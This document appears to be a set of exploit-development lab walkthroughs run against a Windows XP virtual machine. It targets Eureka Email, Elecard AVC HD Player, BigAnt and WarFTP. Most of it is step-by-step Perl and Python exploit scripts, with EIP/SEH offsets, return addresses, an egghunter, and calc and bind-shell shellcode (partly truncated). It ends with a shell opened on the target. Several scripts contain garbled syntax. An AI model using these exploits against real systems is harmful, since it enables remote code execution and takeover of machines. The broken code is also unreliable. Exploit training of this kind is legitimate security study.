Egg Hunting Eureka Email

In classic stack based buffer overflow, the buffer size is big enough to hold the shellcode.

But, what will happen if there is not enough consecutive memory space available for the shellcode to fit in after

overwrite happens.

This vulnerability gets triggered when a client connects to a POP3 server. If this POP3 server sends long / specifically crafted “-ERR” data back to the client, the client crashes and arbitrary code can be executed.

Let’s build the exploit from scratch on XP SP3 English (VirtualBox).

We’ll use some simple lines of perl code to set up a fake POP3 server and send a string of 2000 bytes back (metasploit pattern).

First of all, run a Eureka Email

Setting Account Server 

Create a metasploit pattern of 2000 characters from within Immunity using the following command :

#pattern_create 2000

then, attach a Eureka Email using Ollydbg, like show

Now create your exploit perl script and use the 2000 characters as payload.

use Socket;

#Metasploit pattern=2000"

my $junk = "Aa0Aa1Aa2Aa3A . .;

my $payload=$junk;

#set up listener on port 110

my $port=110;

my $proto=getprotobyname('tcp');

socket(SERVER,PF_INET,SOCK_STREAM,$proto);

my $paddr=sockaddr_in($port,INADDR_ANY);

bind(SERVER,$paddr);

listen(SERVER,SOMAXCONN);

print "[+] Listening on tcp port 110 [POP3]... \n";

print "[+] Configure Eureka Mail Client to connect to this host\n";

my $client_addr;

while($client_addr=accept(CLIENT,SERVER))

{

print "[+] Client connected, sending evil payload\n";

while(1)

{

print CLIENT "-ERR ".$payload."\n";

print "

-> Sent ".length($payload)." bytes\n";

}

}

close CLIENT;

print "[+] Connection closed\n";

Run a Fuzzer

root@bt:/media/Document/IS2C-febri/Day6/egghunter# perl cobaegg.pl

[+] Listening on tcp port 110 [POP3]... 

[+] Configure Eureka Mail Client to connect to this host

then, on Eureka Email choose file window and Send and Receive emails

Look at the Ollydbg Log and registers : “Access violation when executing [41377841]”

Registers look like this :

of the information shown above, EIP 41377841 and ESP x8Ax9Ay

Now we are looking for pattern offset of EIP and ESP. Like the command

root@bt:/opt/metasploit/msf3/tools# ./pattern_offset.rb 41377841

711

root@bt:/opt/metasploit/msf3/tools# ./pattern_offset.rb x8Ax9A

715

and then, modify your fuzzer

use Socket;

#Metasploit pattern=2000"

my $junkeip = "\x41" x 711;

my $junkesp = "\x42" x 4;

my $junkcrash = "\x43" x 2000;

my $payload=$junk;

#set up listener on port 110

my $port=110;

my $proto=getprotobyname('tcp');

socket(SERVER,PF_INET,SOCK_STREAM,$proto);

my $paddr=sockaddr_in($port,INADDR_ANY);

bind(SERVER,$paddr);

listen(SERVER,SOMAXCONN);

print "[+] Listening on tcp port 110 [POP3]... \n";

print "[+] Configure Eureka Mail Client to connect to this host\n";

my $client_addr;

while($client_addr=accept(CLIENT,SERVER))

{

print "[+] Client connected, sending evil payload\n";

while(1)

{

print CLIENT "-ERR ".$payload."\n";

print "

-> Sent ".length($payload)." bytes\n";

}

}

close CLIENT;

print "[+] Connection closed\n";

The Result we can see, the crash override on ESP

search module containing the JMP ESP [07429353].

Do Break Point step for testing. And Nice the result is

for the next Step, we try to calculator payload.

and modify your fuzzer

use Socket;

#Metasploit pattern=2000"

my $junkeip = "\x41" x 711;

my $junkesp = "\x53\x93\x42\x7E";

my $junkloncat = "\x90" x 8;

my $junkcrash = "\xda\xdd\x2b\xc9\xd9 . ."; # Calc.exe

my $payload=$junkeip.$junkesp.$junkloncat.$junkcrash;

#set up listener on port 110

my $port=110;

my $proto=getprotobyname('tcp');

socket(SERVER,PF_INET,SOCK_STREAM,$proto);

my $paddr=sockaddr_in($port,INADDR_ANY);

bind(SERVER,$paddr);

listen(SERVER,SOMAXCONN);

print "[+] Listening on tcp port 110 [POP3]... \n";

print "[+] Configure Eureka Mail Client to connect to this host\n";

my $client_addr;

while($client_addr=accept(CLIENT,SERVER))

{

print "[+] Client connected, sending evil payload\n";

while(1)

{

print CLIENT "-ERR ".$payload."\n";

print "

-> Sent ".length($payload)." bytes\n";

}

}

close CLIENT;

print "[+] Connection closed\n";

Run Eureka Email without Ollydbg, then run the fuzzer.

Now choose file window - Send and Receive emails. And Look a Result calculator pop up

After we success with a calculator, now lets try for a Bind Shell Payload.

modify your fuzzer with the result of Bind Shell Payload. Like this

use Socket;

#Metasploit pattern=2000"

my $junkeip = "w00tw00t".

"\x31\xc9\xb1\x51\xba . .;  # size 344+w00tw00t=352

my $junktambah = "\x90" x 359;

my $junkesp = "\x53\x93\x42\x7E";

my $junkloncat = "\x90" x 8;

my $egghunter = "\x66\x81\xCA\xFF\x0F\x42\x52\x6A\x02\x58\xCD\x2E\x3C\x05\x5A\x74\xEF\xB8".

"\x77\x30\x30\x74". # this is the marker/tag: w00t

"\x8B\xFA\xAF\x75\xEA\xAF\x75\xE7\xFF\xE7";

my $payload=$junkeip.$junktambah.$junkesp.$junkloncat.$egghunter;

#set up listener on port 110

my $port=110;

my $proto=getprotobyname('tcp');

socket(SERVER,PF_INET,SOCK_STREAM,$proto);

my $paddr=sockaddr_in($port,INADDR_ANY);

bind(SERVER,$paddr);

listen(SERVER,SOMAXCONN);

print "[+] Listening on tcp port 110 [POP3]... \n";

print "[+] Configure Eureka Mail Client to connect to this host\n";

my $client_addr;

while($client_addr=accept(CLIENT,SERVER))

{

print "[+] Client connected, sending evil payload\n";

while(1)

{

print CLIENT "-ERR ".$payload."\n";

print "

-> Sent ".length($payload)." bytes\n";

}

}

close CLIENT;

print "[+] Connection closed\n";

Note: Size of bind Shell only 344, while to achieve EIP need 711.

So we need a new variable for achievement EIP
my $junktambah = "\x90" x 359;
So, 344+w00tw00t+359=711

Alright, Now run a Eureka Email without Ollydbg.
Run a Fuzzer. And choose file - Send and receive emails window on the Eureka email.

Now, let's try Telnet like this

Nice, Successfully :-)

Good Luck !!!

Stack-based Overflow on 'Elecard AVC HD Player'

Things that need to prepare are:

1. windows xp 3 (in virtual box)

2. Elecard player application, which is installed in windows)

2. Olly dbg (who already installed on windows)

3. understand the language python (here the user is using a back track 5)

First, prepare  the fuzzingFirst, prepare  the fuzzing 

#!usr/bin/python
file="crash1.m3u"
head="#EXTM3U\n"
head+="#EXTINF:153,Artist - song\n"
dead="\x41" * 25000
file=open(file,'w')
file.write(head+dead)
print"Succesfully Created File ..."
file.close()

Now, Let's Run Elecard AVC HD Player

then, open OllyDbg and Attach Elecard AVC HD Player applications. Choose Mpeg Player

Run a fuzzer. And see the result.

To see the results, select the tab view - SEH Chain. And The result is

Next, try to make the pattern of 25000 byte through # pattern_create

root@bt:/opt/metasploit/msf3/tools# ./pattern_create.rb 25000

then, insert into fuzzer

#!usr/bin/python
file="crash2.m3u"
head="#EXTM3U\n"
head+="#EXTINF:153,Artist - song\n"
dead="Aa0Aa1Aa . ."
file=open(file,'w')
file.write(head+dead)
print"Succesfully Created File ..."
file.close()

after that try restarting OllyDbg and Electra. Rerun the fuzzer. So the result

after the result has been that we can, try to insert into # pattern_offset

root@bt:/opt/metasploit/msf3/tools# ./pattern_offset.rb 33614132

8

Let's try modification the fuzzer to check

#!usr/bin/python

file="crash3.m3u"

head="#EXTM3U\n"

head+="#EXTINF:153,Artist - song\n"

dead ="\x90" * 4

dead+="\xBB\xBB\xBB\xBB"

dead+="\x90" * (25000 - len(dead))

file=open(file,'w')

file.write(head+dead)

print"Succesfully Created File ..."

file.close()

the resullt

further to find the module click menu view select Executable modules.

then all modules will appear., here users D3DIM700.dll use of modules. double click on the module.

after getting into the window of the file D3DIM700.dll CPU. search for right click -> sequence commands. fill in as below. and click find

Olly dbg will point to a memory address in the file that has a series of commands D3DIM700.dll POP, POP, RETN.

Now we've got that to offset 7394A0A6.

insert into fuzzer

#!usr/bin/python

file="crash3.m3u"

head="#EXTM3U\n"

head+="#EXTINF:153,Artist - song\n"

dead ="\x90" * 4

dead+="\xcc\xcc\xcc\xcc"

dead+="\xA6\xA0\x94\x73" #address on D3DIM700.dll

dead+="\x90" * (22000 - len(dead))

file=open(file,'w')

file.write(head+dead)

print"Succesfully Created File ..."

file.close()

we have successfully executed D3DIM700.dll module did break point by pressing F2. 

The next press shif + F9.

olly dbg will then continue the process into memory. look on the left olly dbg look we have managed to do a command POP, POP, RETN.

problem that arises is that there are only a memory space of 5 bytes only. 5byte not enough to save the shell code

Try Modification the fuzzer

#!usr/bin/python

file="crash3.m3u"

head="#EXTM3U\n"

head+="#EXTINF:153,Artist - song\n"

dead ="\x90" * 4

dead+="\xeb\x06\x90\x90"

dead+="\xA6\xA0\x94\x73" #address on D3DIM700.dll

dead+="\x90" * (22000 - len(dead))

file=open(file,'w')

file.write(head+dead)

print"Succesfully Created File ..."

file.close()

The next step we create shell code., open your terminal and follow the commands as shown below:

copy the ip address into your web browser. it will appear as shown below

after click generate., insert the payload into the fuzzer.

#!usr/bin/python

file="crashcalc.m3u"

head="#EXTM3U\n"

head+="#EXTINF:153,Artist - song\n"

dead ="\x90" * 4

dead+="\xeb\x06\x90\x90" #JMP SHORT

dead+="\xA6\xA0\x94\x73" #address on D3DIM700.dll

dead+="\x90" * 16

dead+=("\x29\xc9\x83\xe9\xde . .) # Calc.exe

dead+="\x90" * (25000 - len(dead))

file=open(file,'w')

file.write(head+dead)

print"Succesfully Created File ..."

file.close()

Now, try open Elecard AVC HD Player without Ollydbg and run the fuzzer.

Look what happen???

Elecard AVC HD Player Be a Calculator :-)

Good Luck !!!

FUZZING SEH

Now, we will try exploit BigAnt Application. Let's try it step by step..
First, prepare  the fuzzing

import socket

target_address="192.168.56.101"

target_port=6660

buffer = "USV " + "\x41" * 2500 + "\r\n\r\n"

sock=socket.socket(socket.AF_INET, socket.SOCK_STREAM)

connect=sock.connect((target_address, target_port))

sock.send(buffer)

sock.close()

after that, run BigAnt

then, open OllyDbg and Attach BigAnt applications. Choose AntServer

Run a fuzzer. To see the results, select the tab view - SEH Chain. And The result is

in the image above, BigAnt 2500 crash with a buffer that we send. The results are shown with the number 41 as shown above.

Next, try to make the pattern of 2500 byte through # pattern_create

root@bt:/opt/metasploit/msf3/tools# ./pattern_create.rb 2500

enter the result into the fuzzer

import socket

target_address="192.168.56.101"

target_port=6660

buffer = "USV " + "\x41" * "Aa0Aa1Aa2Aa3A . ." #patter_create 2500

buffer+= "\r\n\r\n"

sock=socket.socket(socket.AF_INET, socket.SOCK_STREAM)

connect=sock.connect((target_add"ress, target_port))

sock.send(buffer)

sock.close()

after that try restarting OllyDbg and BigAnt and rerun fuzzernya. So the result

after the result has been that we can, try to insert into # pattern_offset

root @ bt :/ opt/metasploit/msf3/tools #. / pattern_offset.rb 42326742

966

conclusion is that it takes the value buffer of 966 bytes for the SEH.

After we have the address that used for SEH, enter the address that has a command offset vbajet32dll POP, RETN POP into fuzzer.

To get the offset address vbajet32dll, select the tab view-executable modules - double click VBAJET32. After that, right click - search for - sequence of command. Tyep as below

and the result is

Try doing a Break Point before run fuzzer.  If the result is true

press Shift + f9 to process into memory vbajet32dl. Then press f7 to RETN command.

we need 6 springboard, while memory space that is there is only 4 bytes.

Therefore, it takes 2 bytes to achieve it. So we must modifications the fuzzer

import socket

target_address="192.168.56.101"

target_port=6660

buffer = "USV "

buffer+= "\x90" * 962

buffer+= "\xeb\x06\x90\x90"

buffer+= "\x6A\x19\x9A\x0F"

buffer+= "\x90" * (2500 - len(buffer))

buffer+= "\r\n\r\n"

sock=socket.socket(socket.AF_INET, socket.SOCK_STREAM)

connect=sock.connect((target_address, target_port))

sock.send(buffer)

sock.close()

do breakpoint as before, so the result is

next is to create shellcode or payload with tools # msfweb

root @ bt :/ pentest/exploits/framework2 #. / msfweb

+ ---- = [Metasploit Framework Web Interface (127.0.0.1:55555)

enter the IP address above into your browser

insert the result of Genarate Payload into the Fuzzer

import socket

target_address="192.168.56.101"

target_port=6660

buffer = "USV "

buffer+= "\x90" * 962

buffer+= "\xeb\x06\x90\x90"

buffer+= "\x6A\x19\x9A\x0F"

buffer+= "\x90" * 16

buffer+= ("\xda\xdf\x29\xc9 . .) #Bind Shell

buffer+= "\x90" * (2500 - len(buffer))

buffer+= "\r\n\r\n"

sock=socket.socket(socket.AF_INET, socket.SOCK_STREAM)

connect=sock.connect((target_address, target_port))

sock.send(buffer)

sock.close()

SUCCESSFULLY

GOODLUCK FOR YOUR TRY HARDER !!!

FUZZING

Now, we will try exploit Warftp with Fuzzing. Let's try it step by step ..

First we create fuzzernya. This time we will make the language python fuzzer

import socket

s = socket.socket(socket.AF_INET, socket. SOCK_STREAM)

buffer ="\x41" * 1000

s.connect (('192.168.56.101' ,21))

data = s.recv (1024)

print ("sendingevildatavia USER command ...")

s.send ('USER '+buffer+'\r\n')

data = s.recv (1024)

s.send ('PASS PASSWORD '+'\r\n')

s.close()

print("Finish")

save with .py extension

check that fuzzer run make applications crash or not.

Run warftp.

Then, the fuzzer in the terminal.

So the result, warftp will be lost. That's a sign we managed to make crahs fuzzer.

The next step, check using Olly DBG to know warftp crash in memory

OllyDbg run.

After warftp run, then run the fuzzer in backtrack. Here is the result

The next process is to make patter_create. The goal is to find out the true locations of sebuat string in data packets transmitted by the fuzzer. To do so type the command as below

copy and paste the results of patter_create into fuzzer.

As scribt below

import socket

s = socket.socket(socket.AF_INET,socket. SOCK_STREAM)

buffer ="Aa0Aa1Aa2Aa3A . ." #pattern_create

s.connect (('192.168.56.101' ,21))

data = s.recv (1024)

print ("sendingevildatavia USER command ...")

s.send ('USER '+buffer+'\r\n')

data = s.recv (1024)

s.send ('PASS'+'\r\n')

s.close()

print("Finish")

Run back and warftp OllyDbg. Then run it again fuzzer

from the patter_create, obtained the address and ESP 32714131 EIP is q4Aq5A ...

The next look at how the string override byte register. In order to do so using patter_offset.

Open patter_offset and type the command as shown below

root@bt:/opt/metasploit/msf3/tools# ./pattern_offset.rb 32714131

485

root@bt:/opt/metasploit/msf3/tools# ./pattern_offset.rb q4Aq5A

493

on the above data, it can be seen to achieve EIP registers required 485 bytes of data. While the data is needed to achieve a stack of 493 bytes. Therefore, it can be seen that will overwrite the EIP register byte 486, 487.488 and 489.

to prove it, the fuzzer change the variable buffer and add variable EIP in it. As scribt below

import socket

s = socket.socket(socket.AF_INET,socket. SOCK_STREAM)

buffer ="\x90" * 485

buffer+="\xEF\xBE\xAD\xDE"

buffer+="\x90" * (493-len(buffer))

buffer+="\xCC" * (1000-len(buffer))

s.connect (('192.168.56.101' ,21))

data = s.recv (1024)

print ("sendingevildatavia USER command ...")

s.send ('USER '+buffer+'\r\n')

data = s.recv (1024)

s.send ('PASS'+'\r\n')

s.close()

print("Finish")

So the result as below

Furthermore, to find the address of a memory that stores the JMP ESP command run OllyDbg. On the View menu Select Sub menu Execute modules.

then double click shell32.dll and find (CTRL + F) JMP ESP. Will display memory address

7C9D30D7  FFE4 JMP ESP

7C9D30ED CC INT3

after successfully finding the address in memory ESP JSP Warftp, then enter the address into the fuzzer. As scribt below

import socket

s = socket.socket(socket.AF_INET,socket. SOCK_STREAM)

buffer ="\x90" * 485

buffer+="\xEB\x30\xD9\x7C"

buffer+="\xCC" * (493-len(buffer))

buffer+="\xCC" * (1000-len(buffer))

s.connect (('192.168.56.101' ,21))

data = s.recv (1024)

print ("sendingevildatavia USER command ...")

s.send ('USER '+buffer+'\r\n')

data = s.recv (1024)

s.send ('PASS'+'\r\n')

s.close()

print("Finish")

run back Ollydbg and warftp. 

Next we create the payload. In this case, we use metasploit. Type the command as below

root@bt:~# cd /pentest/exploits/framework2/

root@bt:/pentest/exploits/framework2# ls

data exploits msfcli msfelfscan msfpayload msfweb sdk tools

docs extras msfconsole msfencode msfpescan nops src

encoders lib msfdldebug msflogdump msfupdate payloads t

root@bt:/pentest/exploits/framework2# ./msfweb

+----=[ Metasploit Framework Web Interface (127.0.0.1:55555)

after that, open the browser and type IP address

select the payload Tab and Filter Modules = os Win32. Then select Blind Shell

The result of Generate Payload

enter the results of paylod into fuzzer, as scribt below

import socket

s = socket.socket(socket.AF_INET,socket. SOCK_STREAM)

buffer ="\x90" * 485

buffer+="\xEB\x30\xD9\x7C"

buffer+="\x90" * 32

buffer+=("\x29\xc9\xb1\x51\xd9  . .) #Bind Shell

s.connect (('192.168.56.101' ,21))

data = s.recv (1024)

print ("sendingevildatavia USER command ...")

s.send ('USER '+buffer+'\r\n')

data = s.recv (1024)

s.send ('PASS'+'\r\n')

s.close()

print("Finish")

we try running warftp and fuzzer.

After that, we try to telnet by typing the following command

root@bt:~# telnet 192.168.56.101 4444

Trying 192.168.56.101...

Connected to 192.168.56.101.

Escape character is '^]'.

Microsoft Windows XP [Version 5.1.2600]

(C) Copyright 1985-2001 Microsoft Corp.

C:\Documents and Settings\XP SP3\My Documents>

we can see that the payload successfully enter the buffer in the system warftp server and windows XP running payload successfully.

GOOD LUCK FOR YOUR TRY HARDER !!!